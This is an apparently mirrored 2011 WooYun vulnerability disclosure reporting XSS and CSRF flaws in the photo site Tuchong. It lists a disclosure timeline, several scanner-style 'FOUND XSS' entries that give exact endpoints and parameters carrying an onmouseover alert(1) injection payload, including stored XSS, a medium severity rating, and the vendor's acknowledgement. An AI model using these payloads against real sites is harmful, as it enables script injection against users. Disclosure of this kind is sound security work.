乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2011-03-15: 细节已通知厂商并且等待厂商处理中 2011-03-15: 厂商已经确认,细节仅向厂商公开 2011-03-25: 细节向核心白帽子及相关领域专家公开 2011-04-04: 细节向普通白帽子公开 2011-04-14: 细节向实习白帽子公开 2011-04-14: 细节向公众公开
图虫网存在多个XSS, CSRF漏洞.
FOUND XSS: [ POST ] http://www.tuchong.com/upload/edit/ Parameters: 535408%5Btitle%5D='><input value=shit onmouseover=alert(1)><k v='&535408%5Btags%5D=adsfadfsasd&535408%5Bdescription%5D=asdfahiadfa& Action URL: http://space.tuchong.com/34855/photos/
FOUND XSS: [ POST ] http://space.tuchong.com/api/album/create/ Parameters: alb_title="><input value=shit onmouseover=alert(1)><k v="&alb_description=test& Action URL: http://www.tuchong.com/album/23209/
FOUND XSS: [ POST ] http://space.tuchong.com/api/reply/add/ Parameters: format=html&cmt_parent_id="><input value=shit onmouseover=alert(1)><k v="&cmt_content=shi&cmt_resource_id=34855&cmt_type=user& Action URL: http://space.tuchong.com/api/reply/add/
FOUND XSS: [ POST ] http://www.tuchong.com/api/reply/add/ Parameters: cmt_parent_id="><input value=shit onmouseover=alert(1)><k v="&format=html&cmt_type=album&cmt_content=fuck&from_type=album&anonymous=on&cmt_resource_id=23198&from_id=23198& Action URL: http://www.tuchong.com/api/reply/add/
Found Saved XSS: [ GET ] http://www.tuchong.com/album/23198/?style=thumbnail Parameters: alb_title="><input value=shit onmouseover=alert(1)><k v="&alb_description=test& Action URL: http://space.tuchong.com/api/album/create/
Found Saved XSS: [ GET ] http://space.tuchong.com/34855/albums/ Parameters: alb_title='><input value=shit onmouseover=alert(1)><k v='&alb_description=test& Action URL: http://space.tuchong.com/api/album/create/
look at
http://space.tuchong.com/34855/
I/O Filter plz...
危害等级:中
漏洞Rank:5
确认时间:2011-03-15 11:11
开发的时候没有注意, 漏了做过滤转义, 导致出现如此低级的bug非常感谢!我们会尽快修正
暂无
